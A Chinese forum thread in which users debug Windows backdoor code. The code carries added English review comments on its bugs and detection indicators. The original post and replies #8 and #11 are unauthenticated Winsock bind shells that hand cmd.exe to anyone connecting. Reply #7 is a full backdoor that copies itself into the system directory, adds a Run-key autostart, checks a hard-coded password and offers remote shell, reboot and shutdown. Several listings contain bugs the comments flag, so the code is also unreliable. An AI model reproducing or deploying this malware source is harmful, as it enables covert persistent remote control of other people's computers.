#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
// Original post: a minimal Winsock bind shell. It listens on TCP 4501 on every
// interface, accepts a single peer, spawns cmd.exe with its stdout/stderr
// pointed at an anonymous pipe, and relays whatever it reads from that pipe
// back to the peer. There is no authentication and no encryption: anything
// that can reach the port gets the child's output. From a defender's view the
// observable artifacts are an unusual inbound listener and a hidden cmd.exe
// child of a socket-holding process with inherited pipe handles.
int main(int argc, char **argv)
{
// Initialise Winsock 2.2.
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
// Create the listening socket.
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// NOTE(review): socket() reports failure as INVALID_SOCKET (the value the
// accept loop below checks for), not SOCKET_ERROR, so this test never fires.
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
// Local address: any interface, port 4501. sin is never zeroed, so sin_zero
// holds whatever was on the stack.
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
// Bind the address.
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
// Start listening (backlog 5).
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
// Anonymous pipe. bInheritHandle = TRUE makes both ends inheritable by the
// child created below. Neither end is closed on any of the early-return paths.
HANDLE hReadFile,hWritePipe;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if(CreatePipe(&hReadFile,&hWritePipe,&sa,0) == 0)
{
printf("Create pipe error!\n");
return 0;
}
// Build the cmd.exe path. {'0'} stores the character '0' in cmdline[0], so
// strlen(cmdline) is 1 and GetSystemDirectory is told the buffer holds one
// byte; reply #2 points this out (it wants {0} and sizeof(cmdline)). The
// return value is not checked, and strcat() appends to whatever is there.
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
strcat(cmdline,"\\cmd.exe /c");
// STARTUPINFO is copied from this process; only the std handles, the
// show-window flag and dwFlags are overridden. hStdInput is never set, which
// is what reply #9 asks about ("where is cmd's input").
PROCESS_INFORMATION pi;
STARTUPINFO si;
GetStartupInfo(&si);
// NOTE(review): reply #9 flags these two lines — the child is handed the
// pipe's read end as its stdout/stderr, and the parent also reads from that
// same end in the loop at the bottom, so no output can travel through the
// pipe as written.
si.hStdOutput = hReadFile;
si.hStdError = hReadFile;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
// Client socket and buffers. The {'0'} initialisers again put a literal '0'
// in byte 0 of each buffer, which matters for the strlen() call below.
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
char recvbuff[1024] = {'0'}; // receive buffer (the peer's command line)
char sendbuff[1024] = {'0'}; // send buffer (child output read from the pipe)
DWORD toSend = 0; // number of bytes ReadFile placed in sendbuff
// Accept loop: retry accept() until one connection arrives, then fall out.
// Only a single peer is ever served.
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
// Receive the peer's command line. The length passed is strlen(recvbuff),
// i.e. 1 because of the '0' initialiser, so at most one byte is read; the
// return value (byte count, 0 on close, SOCKET_ERROR) is ignored.
recv(sClient,recvbuff,strlen(recvbuff),0);
//strncat(cmdline,recvbuff,strlen(recvbuff));
// Spawn cmd.exe with recvbuff as its command line and handle inheritance on.
// dwCreationFlags is written as NULL (a pointer constant where a DWORD is
// expected). A failure is only printed; execution continues into the read
// loop regardless, and pi's process/thread handles are never closed.
if(CreateProcess(cmdline,recvbuff,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi) == 0)
{
printf("Create process error!\n");
}
// Close the parent's copy of the write end (the child holds its own copies of
// both ends because they were inheritable).
CloseHandle(hWritePipe);
// Relay the child's output to the peer.
// NOTE(review): the first argument here is the function ReadFile, not the
// HANDLE hReadFile; a C++ compiler should reject this line as written.
while(ReadFile(ReadFile,sendbuff,1024,&toSend,NULL))
{
// send() result (partial send, error) is not checked.
send(sClient,sendbuff,toSend,0);
}
// sClient, sListen and hReadFile are leaked and WSACleanup is never called.
return 0;
}
12 个解决方案
#1
这么久都没人回哦,我自己顶一下
#2
1.错误
char cmdline[256] = {'0'};
GetSystemDirectory(cmdline,strlen(cmdline));
改为
char cmdline[256] = {0};
GetSystemDirectory(cmdline, sizeof(cmdline));
2.看不出这里的管道和telnet是什么关系
3.想模拟telnet协议?telnet端口为23
4.这里貌似是socket + 管道 + 控制台
将recv的数据当成命令行通过管道发到cmd去执行,
将结果send回去
#3
不是高手,错误的进入了,我离开
#4
这段代码好像是黑客编程的。。跟Telnet无关吧..
#5
哦,我的意思是,这个后门能用telnet的方法连接上,不是telnet本身,是我理解错了。
我再研究一下
#6
telnet不支持管道,你需要在控制的机器上实现telnet客户端。
#7
先丢段代码,在win7下可能有问题。
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
// Connected peer socket; global so every command branch in main() can write
// to it.
SOCKET clientFD;
// "\10" is octal 10 = 0x08 (backspace). One byte of it is sent after most
// responses; the code does not say why — possibly to visually cover the NUL
// byte that the sizeof()-sized send() calls in main() transmit — confirm with
// a telnet client.
char del[]="\10";
// Hard-coded plaintext credential, compared with strcmp() in main(). It is a
// fixed string inside the binary and therefore a trivial static indicator.
char password[]="chris7";
// Help text returned for "?" and after any unknown command.
char helpmess[]=
"? --get help"
"\nshell --get remote cmd shell"
"\nreboot --reboot remote computer"
"\nshutdown --shutdown remote computer"
"\nquit --quit, can connect again"
"\nexitshell --backdoor exit\n";
// Reply #7: a password-gated backdoor. It installs itself for autorun, then
// listens on TCP 617 on every interface and, after a plaintext password check,
// accepts the commands listed in helpmess ("?", "shell", "reboot",
// "shutdown", "quit", "exitshell"). Host indicators visible in this code: a
// copy of the executable named 7shell.exe in the system directory, an HKLM
// ...\CurrentVersion\Run value named "7shell", the fixed port and the password
// string. Network indicators: the "Password:" and "7shell>" prompts sent in
// the clear.
int main(){
// Persistence: copy this executable into the system directory and register it
// under the machine-wide Run key (KEY_ALL_ACCESS on HKLM normally needs an
// elevated process). None of the GetModuleFileName / GetSystemDirectory /
// CopyFile results are checked.
char ExeFile[MAX_PATH];
char TempPath[MAX_PATH];
GetModuleFileName(NULL,ExeFile,MAX_PATH);
GetSystemDirectory(TempPath,MAX_PATH);
// Unbounded strcat(): TempPath overflows if the directory name leaves fewer
// than 12 bytes of the MAX_PATH buffer free.
strcat(TempPath,"\\7shell.exe");
CopyFile(ExeFile,TempPath,FALSE);
HKEY key;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS){
// cbData is lstrlen(TempPath), i.e. without the terminating NUL that a REG_SZ
// value is documented to include.
RegSetValueEx(key,"7shell",0,REG_SZ,(BYTE *)TempPath,lstrlen(TempPath));
RegCloseKey(key);
}
WSADATA ws;
SOCKET listenFD;
// Buff receives one byte per recv(); cmd accumulates a line (256 elements, so
// valid indices are 0..255).
char Buff[256],cmd[256];
unsigned long lBytesRead;
// WSAStartup / WSASocket / bind / listen results are all ignored. WSASocket
// with dwFlags 0 creates a non-overlapped socket — presumably deliberate so
// the accepted socket can be used as a console std handle below; confirm.
WSAStartup(MAKEWORD(2,2),&ws);
listenFD=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
struct sockaddr_in server;
server.sin_family=AF_INET;
server.sin_port=htons(617);
server.sin_addr.s_addr=ADDR_ANY;
bind(listenFD,(sockaddr *)&server,sizeof(server));
listen(listenFD,2);
int iAddrSize=sizeof(server);
// Reconnect point: every disconnect or failed login jumps back here. The same
// sockaddr is reused as accept()'s out-parameter, overwriting the bound
// address. An accept() failure (INVALID_SOCKET) is not checked.
wait:
clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
// Password check: read bytes one at a time until CR or LF.
// NOTE(review): every send() in this function passes sizeof(literal), which
// includes the terminating NUL, so each response carries an extra 0x00 byte.
send(clientFD,"Password:",sizeof("Password:"),0);
lBytesRead=0;
while(lBytesRead<256){
// Only SOCKET_ERROR counts as a disconnect; a return of 0 (peer closed the
// connection) leaves Buff[0] stale and keeps looping.
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;
}
lBytesRead++;
// NOTE(review): cmd has 256 elements, so cmd[256] is one past the end — an
// out-of-bounds stack write on every iteration. It also does not terminate
// cmd when 256 bytes arrive without a line ending, so strcmp() below can
// read past the buffer.
cmd[256]='\0';
}
// Plain strcmp() against the hard-coded password; a mismatch just drops the
// connection and returns to accept().
if(strcmp(cmd,password)!=0){
closesocket(clientFD);
goto wait;
}
// Banner. infosize is sizeof() of the shorter literal (with NUL), so
// infosize+1 equals sizeof() of the literal actually sent, which has one
// extra "\10" byte.
int infosize=sizeof("Welcome to 7shell! Type ? to get help.\n");
send(clientFD,"Welcome to 7shell! Type ? to get help.\n\10",infosize+1,0);
send(clientFD,del,1,0);
send(clientFD,"7shell>",sizeof("7shell>"),0);
// Command loop: read one line into cmd, dispatch on an exact string match,
// re-print the prompt.
while(1){
ZeroMemory(cmd,256);
lBytesRead=0;
// Same line reader as the password check, including the cmd[256] write and
// the unhandled recv()==0 case.
while(lBytesRead<256){
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR){
closesocket(clientFD);
goto wait;
}
cmd[lBytesRead]=Buff[0];
if(Buff[0]==0xa||Buff[0]==0xd){
cmd[lBytesRead]=0;
break;}
lBytesRead++;
cmd[256]='\0';
}
// Dispatch on the command string.
if(strcmp(cmd,"?")==0){
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else if(strcmp(cmd,"shell")==0){
// Interactive shell: cmd.exe inherits the peer socket as stdin/stdout/stderr
// (bInheritHandles is 1). The parent then blocks until cmd.exe exits, so no
// other command is processed meanwhile. For detection this is a hidden
// cmd.exe whose console handles are a socket, child of a process that owns
// a listening socket.
// NOTE(review): si.cb stays 0 after ZeroMemory, whereas CreateProcess
// expects sizeof(si). If CreateProcess fails, ProcessInformation is
// uninitialised but its hProcess is still waited on, terminated and closed.
// hThread is never closed.
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)clientFD;
PROCESS_INFORMATION ProcessInformation;
if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)){
send(clientFD,"Fail!\n",sizeof("Fail!\n"),0);
send(clientFD,del,1,0);
}
// TerminateProcess after an INFINITE wait acts on an already-exited process.
WaitForSingleObject(ProcessInformation.hProcess,INFINITE);
TerminateProcess(ProcessInformation.hProcess,0);
CloseHandle(ProcessInformation.hProcess);
}
else if(strcmp(cmd,"reboot")==0){
// Enable SeShutdownPrivilege on this process's token, then force a reboot.
// LookupPrivilegeValue's result is unchecked; AdjustTokenPrivileges is called
// with BufferLength 0 and judged via GetLastError() (ERROR_NOT_ALL_ASSIGNED
// when the privilege is not held). hToken is never closed.
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError()!=ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
// sizeof("Success") is 8 while the literal passed is "Success!" (9 bytes
// with NUL), so this branch sends "Success" without '!' — inconsistent
// with the shutdown branch below.
send(clientFD,"Success!",sizeof("Success"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"shutdown")==0){
// Same sequence as "reboot" with EWX_SHUTDOWN; same unchecked results and
// leaked hToken.
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES)NULL,0);
if(GetLastError() != ERROR_SUCCESS){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else if(!ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0)){
send(clientFD,"Fail!",sizeof("Fail!"),0);
send(clientFD,del,1,0);
}
else{
send(clientFD,"Success!",sizeof("Success!"),0);
send(clientFD,del,1,0);
}
}
}
else if(strcmp(cmd,"quit")==0){
// Drop this client and go back to accept().
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
goto wait;
}
else if(strcmp(cmd,"exitshell")==0){
// Close both sockets and exit the process. WSACleanup is never called, and
// the autorun entry written above is left in place.
send(clientFD,"Success!",sizeof("Success!"),0);
closesocket(clientFD);
closesocket(listenFD);
goto end;
}
else if(strlen(cmd)){
// Unknown non-empty command: error text plus the help.
send(clientFD,"Bad command! See help:\n",sizeof("Bad command! See help:\n"),0);
send(clientFD,helpmess,sizeof(helpmess),0);
send(clientFD,del,1,0);
}
else
; // empty line: just re-print the prompt
send(clientFD,"7shell>",sizeof("7shell>"),0);
}
end:
return 0;
}
#8
核心部分可能只需要这样,并不需要管道,或者把一个socket当作管道也可以的。
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
// Enables the privilege named by szType on the current process's token.
// Returns false only when OpenProcessToken or AdjustTokenPrivileges fails.
// NOTE(review): AdjustTokenPrivileges returns nonzero even when the privilege
// could not be enabled (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so true here
// does not prove the privilege is held. LookupPrivilegeValueW's result is not
// checked (luid is indeterminate if it fails), and hToken is never closed.
// szType is wide and the W variant is called explicitly; the caller passes
// SE_DEBUG_NAME, which presumably is a wide literal only in UNICODE builds.
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* Open our own token with enough access to adjust privileges. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
// Reply #8: bind shell without the pipe — the accepted socket itself is
// handed to cmd.exe as stdin/stdout/stderr. Listens on TCP 4501 on every
// interface, unauthenticated, serves one connection, then exits. Observable
// artifacts: an inbound listener and a hidden cmd.exe child of this process
// whose console handles are a socket.
int main(int argc, char **argv)
{
// SeDebugPrivilege is requested up front; a failure is only logged. Nothing
// below visibly needs it unless the creation flag noted at CreateProcess is
// intended.
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
// Initialise Winsock 2.2.
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
// Create the listening socket.
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// NOTE(review): socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR
// (the accept loop below uses the right constant), so this test never fires.
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
// Local address: any interface, port 4501 (sin_zero left uninitialised).
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
// Bind the address.
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
// Start listening (backlog 5).
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
// Client socket.
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
// Accept loop: retry until one peer connects; only that peer is served.
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
// STARTUPINFO: hidden window, all three std handles set to the peer socket.
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
// NOTE(review): three things on this call deserve a second look. (1)
// bInheritHandles is FALSE, while STARTF_USESTDHANDLES gives the child
// handles it could only reach by inheritance — this may be the reason behind
// reply #12's "nothing comes back". (2) dwCreationFlags is 1, which is the
// DEBUG_PROCESS bit rather than "no creation flags" as the comment says, and
// this process never services debug events. (3) The command line is a wide
// literal (L"..."), so this presumably builds only under UNICODE, and
// CreateProcessW is documented as possibly writing into lpCommandLine, which
// therefore must not be a constant string.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
// %d is used for a DWORD; %lu would match GetLastError()'s type.
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
// Block until cmd.exe exits (one session per run), then TerminateProcess on
// an already-exited process. pi.hThread, both sockets and WSACleanup are
// never closed/called.
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#9
个人认为几个有问题的地方。
1。初始化char数组用0
2.si.hStdOutput = hReadFile;
si.hStdError = hReadFile;????这里有问题 还有cmd的input在哪里
3。字符串操作尽量用TCHAR之类的宽字符,字符串函数也是一样,Windows via C/C++如是说!!!
#10
干嘛要写代码?直接打开telnet server服务不就行了。
#11
#include <Winsock2.h>
#pragma comment (lib,"ws2_32.lib")
#include <stdio.h>
// Enables the privilege named by szType on the current process's token.
// Returns false only when OpenProcessToken or AdjustTokenPrivileges fails.
// NOTE(review): AdjustTokenPrivileges returns nonzero even when the privilege
// could not be enabled (GetLastError() == ERROR_NOT_ALL_ASSIGNED), so true here
// does not prove the privilege is held. LookupPrivilegeValueW's result is not
// checked (luid is indeterminate if it fails), and hToken is never closed.
// szType is wide and the W variant is called explicitly; the caller passes
// SE_DEBUG_NAME, which presumably is a wide literal only in UNICODE builds.
bool EnableProcessToken(const WCHAR* szType)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
/* Open our own token with enough access to adjust privileges. */
if(!::OpenProcessToken(::GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
return false;
::LookupPrivilegeValueW(NULL, szType, &luid);
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
return false;
return true;
}
// Reply #11 re-posts the reply #8 listing unchanged: a bind shell without a
// pipe — the accepted socket itself is handed to cmd.exe as
// stdin/stdout/stderr. Listens on TCP 4501 on every interface,
// unauthenticated, serves one connection, then exits. Observable artifacts:
// an inbound listener and a hidden cmd.exe child of this process whose
// console handles are a socket.
int main(int argc, char **argv)
{
// SeDebugPrivilege is requested up front; a failure is only logged. Nothing
// below visibly needs it unless the creation flag noted at CreateProcess is
// intended.
if (!EnableProcessToken(SE_DEBUG_NAME))
{
printf("EnableProcessToken faild;\n");
}
// Initialise Winsock 2.2.
WSADATA wsaData;
WORD sockVersion = MAKEWORD(2,2);
if(WSAStartup(sockVersion,&wsaData) != 0)
{
printf("WSAData startup error!\n");
return 0;
}
// Create the listening socket.
SOCKET sListen;
sListen = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
// NOTE(review): socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR
// (the accept loop below uses the right constant), so this test never fires.
if(sListen == SOCKET_ERROR)
{
printf("estabish sListen socket error!\n");
return 0;
}
// Local address: any interface, port 4501 (sin_zero left uninitialised).
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.S_un.S_addr = INADDR_ANY;
sin.sin_port = htons(4501);
// Bind the address.
if(bind(sListen,(LPSOCKADDR)&sin,sizeof(sin)) == SOCKET_ERROR)
{
printf("bind error!\n");
return 0;
}
// Start listening (backlog 5).
if(listen(sListen,5) == SOCKET_ERROR)
{
printf("listen error!\n");
return 0;
}
// Client socket.
SOCKET sClient;
sockaddr_in remote;
int nAddrLen = sizeof(remote);
// Accept loop: retry until one peer connects; only that peer is served.
while(TRUE)
{
sClient = accept(sListen,(LPSOCKADDR)&remote,&nAddrLen);
if(sClient == INVALID_SOCKET)
{
printf("当前无连接\n");
continue;
}
break;
}
// STARTUPINFO: hidden window, all three std handles set to the peer socket.
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)sClient;
ZeroMemory(&pi, sizeof(pi));
// Start the child process.
// NOTE(review): three things on this call deserve a second look. (1)
// bInheritHandles is FALSE, while STARTF_USESTDHANDLES gives the child
// handles it could only reach by inheritance — this may be the reason behind
// reply #12's "nothing comes back". (2) dwCreationFlags is 1, which is the
// DEBUG_PROCESS bit rather than "no creation flags" as the comment says, and
// this process never services debug events. (3) The command line is a wide
// literal (L"..."), so this presumably builds only under UNICODE, and
// CreateProcessW is documented as possibly writing into lpCommandLine, which
// therefore must not be a constant string.
if(!CreateProcess( NULL, // No module name (use command line)
L"C:\\Windows\\System32\\cmd.exe", // Command line
NULL, // Process handle not inheritable
NULL, // Thread handle not inheritable
FALSE, // Set handle inheritance to FALSE
1, // No creation flags
NULL, // Use parent's environment block
NULL, // Use parent's starting directory
&si, // Pointer to STARTUPINFO structure
&pi ) // Pointer to PROCESS_INFORMATION structure
)
{
// %d is used for a DWORD; %lu would match GetLastError()'s type.
printf( "CreateProcess failed (%d)\n", GetLastError());
return -1;
}
else
{
printf( "CreateProcess Ok");
}
// Block until cmd.exe exits (one session per run), then TerminateProcess on
// an already-exited process. pi.hThread, both sockets and WSACleanup are
// never closed/called.
WaitForSingleObject(pi.hProcess,INFINITE);
TerminateProcess(pi.hProcess,0);
CloseHandle(pi.hProcess);
return 0;
}
#12
这个程序编译后执行,telnet上去,为什么没有任何返回?执行命令也没有返回,或者返回干脆是乱码~